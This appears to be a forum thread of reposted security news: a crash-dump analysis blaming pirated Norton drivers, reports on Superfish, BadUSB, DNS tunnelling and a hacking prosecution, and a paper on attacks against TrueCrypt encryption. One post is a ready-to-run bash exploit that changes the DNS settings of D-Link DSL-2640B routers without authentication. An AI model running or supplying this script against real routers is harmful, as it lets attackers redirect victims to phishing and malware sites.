fffff800`02ae1561 Ntfs!NtfsFspCloseInternal+0x186 fffff880`08586cb0 fffff800`02d740ca nt!ExpWorkerThread+0x111 fffff880`08586d40 fffff800`02ac8be6 nt!PspSystemThreadStartup+0x5a fffff880`08586d80 00000000`00000000 nt!KxStartSystemThread+0x16 Not going to put comments, but rather just talk about it. We were starting a system thread which turned out to be a worker thread (as we can see from the ExpWorkerThread function), and from then on go throughout various NT file system calls. Given the fact that it's a worker thread dealing with NTFS tells us we're likely dealing with a driver requiring delayed processing, etc. As we're going through various NTFS calls, we can see we're preparing the File Control Block (FCB) and Stream Control Block (SCB) for removal and deletion. This also tells us if anything, it's a driver working actively with/for the file system. Looking at the loaded modules list for any drivers actively working with the file system, what do we find? Hint: A lot of Symantec/Norton kernel-mode drivers 2: kd> lmvm SRTSP64 start end module name fffff880`082d4000 fffff880`08394000 SRTSP64 (deferred) Image path: SRTSP64.SYS Image name: SRTSP64.SYS Timestamp: Tue Mar 29 22:46:12 2011 Here is Symantec's x64 Real Time Storage Protection (SRTSP) driver. This driver is used by Symantec's Auto-Protect feature, which is what scans files under various conditions. You can expect to find this kernel-mode driver on any system with NIS installed, so what's the big deal? The timestamp/date on the driver itself is from March 29th 2011. The time of the bug check is: Debug session time: Tue Feb 3 23:57:58.466 2015 (UTC - 5:00) Okay, so we have a kernel-mode driver from/for Norton that's approximately as of this blog post 3.8 years old. That's.... bad. To give the user the absolute ultimate benefit of the doubt, I for a split-second thought that perhaps maybe Symantec really has a kernel-mode driver regarding RTP that's 3.8 years old. Surely there may be hundreds of vulnerabilities, but it's possible.. right? Wrong. 2: kd> vertarget Windows 7 Kernel Version 7601 (Service Pack 1) MP (4 procs) Free x64 Product: WinNt, suite: TerminalServer SingleUserTS Personal Built by: 7601.18700.amd64fre.win7sp1_gdr.141211-1742 It's a Windows 7 x64 system, so let's create a test environment really quick and install the latest trial version of NIS. Ah, that's much better. Unfortunately, that wasn't the only out of date kernel-mode driver regarding Symantec loaded on this particular system. Let's keep comparing: 2: kd> lmvm SYMDS64 start end module name fffff880`01279000 fffff880`012ea000 SYMDS64 (deferred) Image path: SYMDS64.SYS Image name: SYMDS64.SYS Timestamp: Tue Dec 07 19:16:58 2010 Symantec's x64 Data Store (SymDS) driver. 2: kd> lmvm SYMEFA64 start end module name fffff880`014f4000 fffff880`015d8000 SYMEFA64 (deferred) Image path: SYMEFA64.SYS Image name: SYMEFA64.SYS Timestamp: Sun Mar 13 23:20:58 2011 Symantec's x64 Extended File Attributes driver. 2: kd> lmvm SYMEVENT64x86 start end module name fffff880`01dbf000 fffff880`01df5000 SYMEVENT64x86 (deferred) Image path: SYMEVENT64x86.SYS Image name: SYMEVENT64x86.SYS Timestamp: Thu Mar 24 19:02:36 2011 Symantec's x64 SymEvent driver. 2: kd> lmvm SRTSPX64 start end module name fffff880`01c2d000 fffff880`01c43000 SRTSPX64 (deferred) Image path: SRTSPX64.SYS Image name: SRTSPX64.SYS Timestamp: Tue Mar 29 22:46:18 2011 Symantec's x64 Real Time Storage Protection (SRTSP - PEL) driver. 2: kd> lmvm SYMNETS start end module name fffff880`01d58000 fffff880`01dbf000 SYMNETS (deferred) Image path: SYMNETS.SYS Image name: SYMNETS.SYS Timestamp: Tue Apr 19 18:33:31 2011 Symantec's Network Security WFP driver. Overall, we can see that all of these Symantec/Norton kernel-mode drivers are not their latest versions. Given the fact that the user's system bug checked Feb 2015 and many of its kernel-mode drivers are 3.8 years (or older) old, we know it's pirated. Remove pirated Norton, crashes stop. Surprise surprise. Moral of the story: If you really are going to pirate an antivirus, be sure it's actually as up to date as it would be if you paid for it. If you're running an antivirus with kernel-mode drivers from 3.8> years old, the amount of vulnerabilities you're vulnerable to that were patched years ago is pretty high. You're also opening yourself up to becoming infected with old malware that was invalidated if not further developed if it relied on certain EOP (or other) exploits to get around active protection. Also, as you can see here, chances are you'll bug check considering you're also subject to ~3.8> year old driver bugs that have since been patched. You could alternatively just buy the antivirus. Crazy, I know. source
  15. Aerosol
    CANCUN – Hannes Sjoblad of the Swedish Biohacking Association throws a mean implant party, the latest of which was held today on stage at the Security Analyst Summit. Kaspersky Lab researcher Povel Torudd bravely volunteered to have a NFC implant the side of a grain of rice shot into the skin between his thumb and forefinger. The chips can be used for a variety of purposes, including as a second form of authentication or the tracking of healthcare information, and people such as Sjoblad believe implants can soon supplant things such as car keys, proximity cards and other authenticators, while also introducing additional risk to users’ physical well being and privacy. “These implants have the potential to be used for digital logins, storage of public encryption keys, and perhaps replace all silly passwords and don’t work,” Sjoblad said. “This technology has the potential for solving these issues.” Data collected by the tiny battery-powered APT chip can be read by a mobile app. Sjoblad, for example, has also set up in his chip rebate memberships for retailers where he shops in Sweden, his business cards, gym membership cards and more. “It’s made my life easier and interesting,” he said. From a security perspective, however, implanting a tracking technology introduces physical risk to the wearer. Already, with existing human implant technology such as insulin pumps, pacemakers, cochlear implants, there are risks that they can be remotely accessible, putting private data. Complicating matters is the introduction of health care data into the equation. For example, health care monitors track volumes of personal data over periods of time, trending data that could be of value if exposed, not to mention a detriment to the user’s privacy. Sjoblad slots usage of implanted NFC chips into a pair of categories: identification and information storage. The chips can be used to identify and authenticate the user for building entry or transaction verification, or use stored data for personalization, in a car for example, to adjust seat and mirror settings automatically for the particular user. The saving grace for security may be the potential for this technology to replace passwords, a long reviled means of authentication that’s simply bypassed, onerous to manage and a general failure given the recent litany of breaches. “Passwords are not human friendly,” Sjoblad said. Source
  16. Aerosol
    CANCUN – BadUSB was the hot hack of the summer of 2014. Noted researcher Karsten Nohl delivered a talk at Black Hat during which he explained how USB controller chips in peripheral devices that connect over USB can be reprogrammed. The result is a completely compromised device hosting undetectable code that could be used for a number of malicious purposes, including remote code execution or traffic redirection. While the situation is bad enough for IT systems that would be in line for serious data loss, would the affect be similar on the processes under the watch of industrial control systems? Today at the Kaspersky Lab Security Analyst Summit, Michael Toecker of Context Industrial Security delivered what he termed a public service announcement in which he explained how a riff on BadUSB attacks could indeed be carried out against industrial equipment. While the risks are still admittedly theoretical, Toecker reported that USB-to-serial converters used to connect to critical hardware via old-school nine-pin serial ports can be abused to manipulate ICS gear by installing reprogrammed firmware. “Engineers trust these [serial] connections more than Ethernet in ICS; if they have a choice, they pick serial vs Ethernet, because they trust that,” Toecker said. “What engineers don’t see is that bump in the wire that could be programmed maliciously, Telnet over two wires. That’s what thought of when I heard about BadUSB.” To test his theory, Toecker said he bought 20 different USB-to-serial converters online, ripped them apart and used a number of resources to try to figure out whether the chips inside them could be reprogrammed BadUSB style. Of the 20, he learned that 15 from ATMEGA, FTDI, WCH, Prolific and SiLabs, were essentially not re-programmable. “It wasn’t as bad as I thought,” Toecker said. “I was not able to change the underlying functionality via USB ports.” Of the remaining converters, a processor from Texas Instruments, the TUSB 3410 was reprogrammable, making it a definite risk, Toecker said. An attacker who is able to modify firmware will be able to maintain persistence on a system, run code, or deny attempts to update existing issues on the chip. In the case of the TUSB 3410, the chip has two modes of operation, Toecker said; one is where firmware is pulled from a chip on the board, or another where firmware is pulled from a driver on the host machine. “Drivers installed on the host will provide firmware to the device and then run that firmware and do what it’s supposed to do after that,” Toecker said. “That’s the badness of BadUSB.” BadUSB, for example, continues to propagate because it is persistent on the chip and undetectable. Mitigating the risk with USB-to-serial converters is that an attacker would have to be on an ICS system hosting the drivers. “If you were to plug that USB-to-serial converter into anything else, it would not function because you did not have the correct drivers. But if you did have the correct drivers it would then go through the same process but provide good firmware,” Toecker said. “You have to own the host that’s on it. This is why it’s of a less severity of a normal BadUSB infection.” Source
  17. Aerosol
    CANCUN–Attackers have long used distributed denial of service attacks to knock domain-name servers offline but over the last several months malware creators have taken to using DNS requests to tunnel stolen data. Jaime Blasco, vice president and chief scientist at AlienVault, showed a handful of real malware samples that are using this technique at the Kaspersky Lab Security Analyst Summit Tuesday. Blasco, who’s identified suspicious domains before, took the crowd through the motions by discussing some tools to use: NSTX, OzymanDNS, Iodine and perhaps the best known, DNScat. The apps allow users to upload files, run shells, and powershell scripts to download other payloads to use within attacks. For the attack, Blasco described how there has to be an upstream channel which has a fully qualified domain name (FQDN) that has a minimum label length of 63 octets and a maximum domain length of 255 octets. The downstream channel can store a handful of different files in the: TXT records, CNAME records, NULL records and on occasion AAAA records. As part of an experiment Blasco and company found 50 million files that contained traffic, threw it into a parser and found that many malware samples store a URL in a TXT file and tell it which piece of spyware or malware to deploy. “There’s a bunch of software that are using DNS in a weird way,” Blasco said. One of the types of malware they found, FeederBot, was using base64 to encode and had an RC4 encrypted payload. Others used base64 and XOR. Blasco also stumbled upon FrameworkPOS, a fairly recent POS malware variant that was curiously spotted using DNS, although he believes the creators were either testing it out to allow DNS or had access to a company that used it. Morto, a worm that’s been around for a while and PlugX, a remote administration tool that’s existed in some incarnation since 2008, but has been making a return as of late, also turned up. Blasco said that since outbound DNS is usually allowed on corporate networks, many attackers have used it and avoided detection with a simple network protector like MyDLP. Anomalies in DNS traffic, like large content in TXT or NULL records, or a spike in DNS queries, or queries with long domains and subdomains are signs that something fishy might be afoot with a system’s DNS requests, he said. Source
  18. Aerosol
    A pretty shocking thing came to light this evening – Lenovo is installing adware that uses a “man-in-the-middle” attack to break secure connections on affected laptops in order to access sensitive data and inject advertising. As if that wasn’t bad enough they installed a weak certificate into the system in a way that means affected users cannot trust any secure connections they make – TO ANY SITE. We trust our hardware manufacturers to build products that are secure. In this current climate of rising cybercrime, if you cant trust your hardware manufacturer you are in a very difficult position. That manufacturer has a huge role to play in keeping you safe – from releasing patches to update software when vulnerabilities are found to behaving in a responsible manor with the data the collect and the privileged access they have to your hardware. When bad guys are able to get into the supply chain and install malware it is devastating. Often users find themselves with equipment that is compromised and are unable to do anything about it. When malware is installed with the access a manufacturer has it buries itself deep inside the system often with a level of access that often takes it beyond the reach of antivirus or other countermeasures. This is why it is all the more disappointing – and shocking – to find a manufacturer doing this to its customers voluntarily. Lenovo has partnered with a company called Superfish to install advertising software on it’s customer’s laptops. Under normal circumstances this would not be cause for concern. However Superfish’s software has quite a reputation. It is a notorious piece of “adware”, malicious advertising software. A quick search on Google reveals numerous links for pages containing everything from software to remove Superfish to consumers complaining about the presence of this malicious advertising tool. Superfish Features: Hijacks legitimate connections. Monitors user activity. Collects personal information and uploads it to it’s servers Injects advertising in legitimate pages. Displays popups with advertising software Uses man-in-the-middle attack techniques to crack open secure connections. Presents users with its own fake certificate instead of the legitimate site’s certificate. This presents a security nightmare for affected consumers. Superfish replaces legitimate site certificates with its own in order to compromise the connections so it can install its adverts. This means that anyone affected by this adware cannot trust any secure connections they make. Users will not be notified if the legitimate site’s certificate has been tampered with, has expired or is bogus. In fact they now have to rely on Superfish to perform that check for them. Which it does not appear to do. Because Superfish uses the same certificate for every site it would be easy for another hostile actor to leverage this and further compromise the user’s connections. Superfish uses a deprecated SHA1 certificate. SHA1 has been replaced by SHA-256 because attacks against SHA1 are now feasible with ordinary computing hardware. This is insult on top of injury. Not only are they compromising peoples SSL connections but they are doing it in the most cavalier, insecure way possible. Even worse, they use crackable 1024-bit RSA! The user has to trust that this software which has compromised their secure connections is not tampering with the content, or stealing sensitive data such as usernames and passwords. If this software or any of its control infrastructure is compromised, an attacker would have complete and unrestricted access to affected customers banking sites, personal data and private messages. Below is a photo showing Superfish on an affected laptop presenting a fake certificate instead of the legitimate “Bank of America” certificate. As you can see the user is presented with the fake Superfish certificate instead of the legitimate BoA certificate. The only way a user would know this has happened is if they check the certificate’s details. Something most ordinary users are unlikely to do to a certificate which to all other appearances is valid and secure. As mentioned above the certificate used by Superfish is a deprecated SHA1 certificate that uses 1024-bit RSA. This is particularly obnoxious because they have installed into the system certificates as an unrestricted trusted root certificate. To put it into context they gave it the same level of trust and authority as Microsoft’s own root certificate. Users affected by this can go to any site on the internet, and so long as it presents this certificate they will be fooled into thinking they have a secure connection. Since this certificate uses SHA1 it is feasible that an attacker could break it and hijack it. This means an attacker could create a bogus certificate that every one of these users would trust. This is unbelievably ignorant and reckless of them. Its quite possibly the single worst thing I have seen a manufacturer do to its customer base. At this point I would consider every single one of these affected laptops to be potentially compromised and would reinstall them from scratch. Lenvo’s response? Typical of companies caught with their hand in the cookie jar, they try to play it down while at the same time saying they have disabled it until it can be “fixed”: https://forums.lenovo.com/t5/Lenovo-P-Y-and-Z-series/Lenovo-Pre-instaling-adware-spam-Superfish-powerd-by/m-p/1863174#M79882 However its hard to see how they could “fix” this software. It’s core functionality undermines the security of SSL rendering the last decade or so of work making the web secure completely irrelevant. Source
  19. Aerosol
    A year ago, the Department of Justice threatened to put Fidel Salinas in prison for the rest of his life for hacking crimes. But before the federal government brought those charges against him, Salinas now says, it tried a different tactic: recruiting him. A Southern District of Texas judge sentenced Salinas earlier this month to six months in prison and a $10,600 fine after he pleaded guilty to a misdemeanor count of computer fraud and abuse. The charge stemmed from his repeatedly scanning the local Hidalgo County website for vulnerabilities in early 2012. But just months before he took that plea, the 28-year-old with ties to the hacktivist group Anonymous instead faced 44 felony hacking and cyberstalking charges, all of which were later dismissed. And now that his case is over, Salinas is willing to say why he believes he faced that overwhelming list of empty charges. As he tells it, two FBI agents asked him to hack targets on the bureau’s behalf, and he refused. Over the course of a six-hour FBI interrogation in May, 2013, months after his arrest, Salinas says two agents from the FBI’s Southern District of Texas office asked him to use his skills to gather information on Mexican drug cartels and local government figures accepting bribes from drug traffickers. “They asked me to gather information on elected officials, cartel members, anyone I could get data from that would help them out,” Salinas told WIRED in a phone interview before his sentencing. “I told them no.” “Fundamentally this represents the FBI trying to recruit by indictment,” says Salinas’ lawyer Tor Ekeland, who took the case pro bono last year. “The message was clear: If he had agreed to help them, they would have dropped the charges in a second.” Salinas, to be clear, has no proof of his claims. He had no lawyer present at the time of the questioning, made no recordings, and his story couldn’t be independently confirmed. The FBI has flatly denied his account, writing in a statement to WIRED that Salinas “was never asked to conduct any investigative activity on behalf of the government.” A Department of Justice spokesperson pointed out in a statement that “at no point during the case did the defense ever present any testimony or evidence to show that any of the defendant’s hacking attempts had been made at the behest of the government or at the request of any alleged victim.” But Ekeland says Salinas didn’t testify about his claims of the FBI’s hacking request because there wasn’t a trial. Ekeland advised Salinas not to tell the story until after his sentencing to avoid scuttling his plea deal. And Ekeland believes that story helps to explain the pile of unsupportable charges Salinas faced soon after. The 44 felony charges against Salinas, Ekeland says, were “an intimidation tactic designed to get him to fold, to get him to take a plea or cooperate.” Salinas’ troubles with the law began when his house was raided in early 2012 as part of the investigation of his alleged hacking. He was arrested and all of his computer equipment seized, then released on bail. In May, 2013, as he tells it, he was called by the FBI and told to come to the local field office to retrieve his confiscated computers. When he arrived at the office with his wife, however, he claims he was instead put in a room and questioned. His wife, who was pregnant at the time, was, he says, left to wait for six hours in the building’s lobby. During those six hours, Salinas says FBI agents showed him evidence that he had logged into Anonymous IRC chatrooms. He says they brought up OpCartel, an aborted Anonymous plan in 2011 to hack Mexico’s Zeta drug cartel. And finally, he claims they asked him to help them gather information on both the cartels and local officials who had accepted money from them. “We think you can help us,” Salinas says he was told. “You can help us stop some of this corruption and stop the cartels.” “I’m not going to snitch,” Salinas says he replied. They insisted that they weren’t asking him to inform on his friends or Anonymous associates. “Think of it like this, you have a superpower,” Salinas says the agents told him. “And you should use your superpower to help us help people.” Salinas says he refused. Four months later, he was hit with a single computer fraud and abuse charge. Six months after that, prosecutors filed a superseding indictment, adding 13 more counts. The next month they added another 30, adding up to a total of 44 charges. Eighteen of those charges were for cyberstalking an unnamed victim, and each charge was based on a single instance of Salinas submitting junk text in a contact form on the victim’s website. As those charges mounted, Salinas says he wasn’t asked again to hack for the FBI or otherwise contacted by agents. But he nonetheless believes the series of superseding indictments was meant to convince him to change his mind. “I think with the first charge they thought I would cop a plea and help them, but I didn’t,” Salinas says. “I do believe they were upping the charges to put pressure on me, out of spite for not helping them out.” When Ekeland took Salinas’ case and began to push back, the charges quickly fell to 28 counts and then a single-misdemeanor plea deal. “As soon as they got caught, they folded,” Ekeland told WIRED in November. “I feel sorry for all the people that don’t have the support that Fidel had … There are a ton of Fidel Salinases out there that aren’t as lucky.” In her statement, Justice Department spokeswoman Angela Dodge emphasized that Salinas had in the end been convicted, and she defended the decision to bring the 44 charge indictment against him. “A federal grand jury found probable cause for each of the charges alleged in the indictment and … it is not uncommon for some charges to be dismissed as part of a plea,” she wrote. “We always consider what will serve as a deterrent to similar crimes and what is in the best interest of justice for all parties involved.” But Ekeland says the overreaching charges fit into a pattern of the FBI and Justice Department threatening hackers with ruinous charges to turn them into informants, and in at least one other prominent case, cooperative hackers. While working as an FBI informant, Anonymous hacker Hector “Sabu” Monsegur led hacking operations against more than 2,000 internet domains, according to the leaked sentencing statement of Jeremy Hammond, another Anonymous hacker who took direction from Monsegur. Those targets included government websites in Iran, Pakistan, Nigeria, Turkey and Brazil. Securing a defendant’s cooperation by threatening him or her with a mountain of charges is nothing new, says Electronic Frontier Foundation attorney Hanni Fakhoury. But that’s usually accomplished by first charging the defendant and then allowing him or her to reduce punishment by working as an informant or offering information. “I’ve represented many defendants who were propositioned by the government to come into a room and cooperate,” says Fakhoury. In this case, Salinas’ claims—if they’re at all true—could represent the opposite: a vindictive indictment after a refusal to cooperate. “To proposition him first and punish him after is much rarer and would be much more problematic,” says Fakhoury. “If this is true, it’s very troubling and very improper.” Source
  20. Aerosol
    Canadian Bitcoin exchange Cavirtex, said to be the country's largest, will shut its doors after its two factor authentication credentials were probably compromised. The breach, spotted last Sunday, affected two factor secrets and hashed passwords stored in an older database and did not match log in details to identification records. "Because security and the safety of customer funds are paramount to our mission and the success of Bitcoin in general, Cavirtex has determined to cease active operations in the Bitcoin business and to return all customer funds," the company wrote in a statement. "We believe that the damage to the company's reputation caused by the potential compromise will significantly harm our ability to continue to operate successfully. "As a result of the potential compromise of our database we cannot be certain of the confidentiality of account credentials." Cavirtex said it was solvent and could allow customers to withdraw cash up to 25 March this year. Users were encouraged to change their passwords immediately and wipe Cavirtex browser cookies. The company said it had not lost customer funds. Source
  21. Aerosol
    On Wednesday, Hunter Moore, 28, the notorious founder and operator of revenge porn site IsAnyoneUp.com, pleaded guilty [PDF] to unauthorized access to a computer, aiding and abetting unauthorized access of a computer, and identity theft. The charges each carry a maximum penalty of two to five years in jail, though Moore will not be sentenced until a later date. Moore’s IsAnybodyUp.com became hugely popular for posting nude and sexually explicit photos of people without their permission, and it spawned copycat revenge porn sites like Craig Brittain's IsAnybodyDown.com and Kevin Bollaert’s ugotposted.com. (Brittain was banned from posting any more nude photos of people without their explicit permission in a settlement with the Federal Trade Commission in January, while Bollaert was found guilty earlier this month of identity theft and extortion.) Moore’s site at one point allegedly received over 30 million page views and was bringing in about $10,000 in ad revenue per month. Some of the photos on Moore’s site came from disgruntled lovers handing over their ex’s nude pics (hence the name “revenge porn”), but Moore also pleaded guilty to paying conspirator Charles “Gary” Evens to steal nude photos from victims, often paying Evens up to $200 per week. "To help populate the site with nude photos, defendant aided, abetted, and procured, and willfully caused co-defendant Charles Evens ('Evens') to intentionally access, without authorization, a computer used in interstate commerce belonging to Google by accessing the victims’ e-mail accounts,” Moore’s plea agreement states. As Ars reported when Moore was arrested in January 2014, Evens compromised hundreds of e-mail accounts through social engineering. "It was not exploiting, to our knowledge, any vulnerabilities in any of these online accounts,” Assistant US Attorney Wendy Wu told Ars last year. "Basically, he was impersonating these victims' friends and was able to get confidential information that would allow him to access their accounts.” At one point, Rolling Stone deemed Moore the "Most Hated Man on the Internet," writing, "What was really inspired about [isAnybodyUp.com] was that alongside the photos, Moore included the ex's full name, profession, social-media profile and city of residence, which ensured that the pictures would pop up on Google, which further ensured that, in short order, the ex's mom and boss and everyone else would be seeing him or her online, sans skivvies." Besides a prison term and years of supervised parole, Moore’s plea agreement specifies that the government may delete all the data on Moore’s seized digital devices. "Moore is currently scheduled to be in court on Wednesday, February 25," a press officer for the Central California US Attorney's Office wrote to Ars. "But there is a strong possibility that his next court appearance will be delayed until March." In the UK and California, authorities have been trying to crack down on revenge porn with legislation. Earlier this month, England and Wales passed a law making it a criminal act to distribute nude and explicit photos of a person without their permission, and in California a similar year-old law was used in December to convict a man who posted photos of his ex-girlfriend on Facebook. Source
  22. Aerosol
    #!/bin/bash # # D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit # # Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # Description: # Different D-Link Routers are vulnerable to DNS change. # The vulnerability exist in the web interface, which is # accessible without authentication. # # Tested firmware version: EU_2.03 # ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link # DEVICES OR FIRMWARE VERSIONS MAY AFFECTED. # # Once modified, systems use foreign DNS servers, which are # usually set up by cybercriminals. Users with vulnerable # systems or devices who try to access certain sites are # instead redirected to possibly malicious sites. # # Modifying systems' DNS settings allows cybercriminals to # perform malicious activities like: # # o Steering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # # o Replacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # # o Controlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # # o Pushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # if [[ $# -gt 3 || $# -lt 2 ]]; then echo " D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit" echo " ================================================================" echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>" echo " Example: $0 192.168.1.1 8.8.8.8" echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" echo "" echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>" echo " http://www.ethical-hacker.org/" echo " https://www.facebook.com/ethicalhackerorg" exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then echo " Error : libwww-perl not found =/" exit; fi GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1 Source
  23. Aerosol
    @el_eel daca ai citi tot ai observa ca e trecuta sursa la final...
  24. Aerosol
    ES File Explorer este un file manager pentru android. Cum ai tu la pc ( Windows Explorer ) asa Android are ( ES File Explorer ) @el_eel Description ES, 300 millions global downloads, file manager trend leader on Android! Rated as one of best resource management tools on Android market. ES File Explorer is a free, full-featured file and application manager. It functions as all of these apps in one: file manager, application manager, task killer, download manager, cloud storage client (compatible with Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3, and Ubuntu One...), FTP client, and LAN Samba client. It provides access to pictures, music, video, documents, and other files on both your Android devices and your computers. ES File Explorer allows Android users, no matter where they are, to manage their resources freely. You can access all of your files from your mobile device and share them with others. This app makes it easy to stay connected over 3G, 4G, EDGE, or Wi-Fi to share with friends, upload photos, and watch videos. ES File Explorer 3.0 currently supports 30+ languages: English, Russian, Japanese, Korea, French, Spanish, German, Italian, Czech, Hungarian, Ukrainian, Tamil, Catalan, Turkish, Lithuanian, Portuguese... This standard version is for Android 2.1, 2.2, 2.3, 3.1, 3.2, 4.0, 4.1,4.2 and 4.4. Android 1.5 ~ 2.0 users, please use ES File Explorer Cupcake. You can download older version from our official website.Classic Theme can be downloaded on Google Play. Features List: * File Manager – Manage your files like you do on your desktop or laptop using Multiple Select, Cut/Copy/Paste, Move, Create, Delete, Rename, Search, Share, Send, Hide, Create Shortcut, and Bookmark; operations can be performed on local files (on Android device) or remotely (on your computer) * Application Manager – categorize, uninstall, backup, and create shortcuts to your apps * Remote File Manager – when enabled, manage files on your phone from your computer * Built-in ZIP and RAR support allows you to compress and decompress ZIP files, unpack RAR files, and create encrypted (AES 256 bit) ZIP files * Built-in viewers and players for various file types, including photos, music, and videos; supports third-party applications, such as Quick office, for opening others * Shows thumbnails for APKs and images * Text viewers and editors * Access your home PC via WiFi with SMB * Functions as your FTP and WebDAV client. Manage files on FTP, FTPS, SFTP, and WebDAV servers just like you manage files on your SD card * Supports Dropbox, Box.net, Sugarsync, Google Drive (Google Docs is now a part of Google Drive), SkyDrive, Amazon S3, Yandex and more. ES File Explorer is an enhanced cloud storage client with more functions than the official versions, it can save photos, videos, and other files to your internet drives and share them with others. * Bluetooth file browser You can copy and paste files between Bluetooth ready devices. It supports OBEX FTP for browsing devices and transferring files between Bluetooth devices. * Kill tasks with a single click, increase memory and speed up your device -- includes a simple widget that stays on your home screen for knowing your current RAM situation and automatically killing tasks, with an ignore list to ignore the applications you want to keep running.Task Manager module required * Cache Cleaner and Autostart manager -- Delete those junk files that take up valuable storage space.Task Manager module required. * Root Explorer -- the ultimate set of file management tools for root users. Provides access to the entire file system and all data directories, and allows the user to change permissions. * Developers can visit our website for the developer interface for picking files from your applications, emailing attachments, etc. * More features to come We’re working to create the best file manager on Android, so plz do not hesitate to CONTACT US with your comments, suggestions, issues. FACEBOOK: https://www.facebook.com/EStrongs Other Video: 2)The GREATEST Android Apps: #68 ES File Explorer File Manager - YouTube Link: https://play.google.com/store/apps/details?id=com.estrongs.android.pop
  25. Aerosol
    The need to defend confidentiality of our sensitive information against persistently rising cyber threats has turned most of us toward using encryption on a daily basis. This is facilitated by easy-to-use GUI tools like TrueCrypt that offer advanced encryption without hassles. TrueCrypt offers ‘on-the-fly’ encryption, which means we do not have to wait for large files to decrypt after entering the correct passphrase; files are immediately accessible. Many of us have come to trust TrueCrypt to defend extremely sensitive personal and business secrets. However, there is no such thing as absolute security. Vulnerabilities always exist, and in this paper we look at some of the ways in which TrueCrypt security can be “beaten”. Please note that these attacks may not target a flaw in TrueCrypt itself, but rely on ‘bypassing’ TrueCrypt security or taking advantage of user negligence. This paper seeks to address TrueCrypt users who wish to understand known attacks against TrueCrypt, and forensics analysts who are interested in defeating TrueCrypt during the course of criminal investigations. Downloads: Evil Maid USB image Memory image and encrypted TrueCrypt volume Tools Used: TrueCrypt 7.1 (source code) Truecrack Unprotect Inception Volatility Aeskeyfinder Bulk Extractor\ Known Attacks against TrueCrypt In this paper, we will progress via attacks that are easily understood, and move toward attacks that require advanced understanding of TrueCrypt functionality and encryption systems. Dictionary Attacks The concept of a dictionary attack is simple. We sequentially try all entries in a dictionary file as potential passphrases until we succeed. However, there are obvious downsides to this approach. Most users who are using TrueCrypt to protect their sensitive information are smart enough to use complicated passphrases that would not be found in dictionaries. Also, this attack can get very time-consuming, depending on the size of the dictionary selected. Here, we use a tool called ‘truecrack’ to implement a dictionary attack on a protected TrueCrypt volume. We created a dummy dictionary with 7 phrases, the last of which was the correct passphrase [Figure 1]. Figure 1 Note: Such dictionary attacks on TrueCrypt are incredibly slow, since it uses the Password-Based Key Derivation Function 2 (PBKDF2) that is meant to slow down the password cracking process using key stretching. Brute Force Attacks Brute force attacks deploy a similar concept to dictionary attacks, except here every possible combination of characters is tried from a pre-determined set. To simulate a brute force attack on a TrueCrypt volume, we used the tool ‘unprotect.info’. First, we point it to the encrypted volume [Figure 2]. Figure 2 Next, we set the parameters to be used while implementing the attack [Figure 3]. These parameters will determine the total number of possible combinations. Note that we set the password to the encrypted volume as ‘haha’—a simple combination of 4 characters—to save time during experimentation. Figure 3 For example, in this case we knew the password to be 4 characters long and having all lower case characters. We set the parameters accordingly which gave us a total of (26*26*26*26) =456976 possible passphrases [Figure 4]. Figure 4 The tool sequentially tried all possible combinations until it got to the correct passphrase, which was then displayed to us [Figure 5]. Figure 5 As with dictionary attacks, PBKDF2 used in TrueCrypt would considerably slow down the brute force attacks. DMA Attacks DMA (Direct Memory Access) is used to acquire control of the RAM via the FireWire port. The attacker can then take a full memory dump even if a computer is locked or logged off. If the protected TrueCrypt volume is mounted while the memory dump is taken via a FireWire port, the resulting image would contain the cryptographic keys needed to decrypt and mount the TrueCrypt volume (as explained later in this paper). ‘Inception’ is a free tool that allows one to perform a FireWire attack. The best mitigation against this attack is to simply disable the FireWire drivers in the Operating System and render the port non-functional. Bootkit Attacks Rootkits are a form of advanced malware that facilitate stealthy deployment and operation of programs on a system. Bootkits are variants of rootkits that infect the Master Boot Record (MBR) or a boot sector Wik1. In case full disk encryption is being used, such bootkits are capable of manipulating the original bootloader and replacing it with an infected copy. Such an attack was implemented by researchers Alex Tereshkin and Joanna Rutkowska Ale2. This “evil maid” attack drew attention to the need for physical security of the device that holds the encrypted TrueCrypt volume. The idea is that even if the user is protecting his sensitive information using full disk encryption, the MBR itself is not encrypted and can be infected. Hence, if an attacker can boot your computer using a USB stick, he can overwrite the original bootloader and insert a type of “sniffer” that would “hook” a TrueCrypt password function and save the passphrase the next time the volume is mounted. This passphrase is then extracted by the attacker at a later time. Note: If you wish to replicate this experiment, you would need a copy of the Evil Maid infector image (see Downloads above), and a device that is using full disk encryption. Also note that it is best to use TrueCrypt 6.3a during this test since Evil Maid is no longer updated and is known to corrupt the bootloader when used against TrueCrypt 7.1a. Cached Passphrase Attacks Cached passphrases allow automatically mounting containers without requiring the user to enter the passphrase every time. This cached passphrase is located in ‘TrueCrypt.sys’. In case the user has explicitly told TrueCrypt to ‘cache’ passphrases [Figure 6], an attacker could locate this passphrase in a memory dump. Volatility framework provides a plugin called ‘TrueCryptpassphrase’ especially for the retrieval of cached passphrases from memory. Note that once the attacker has access to the passphrase, he would not need to know the details of the encryption algorithm used or the cryptographic keys. Figure 6 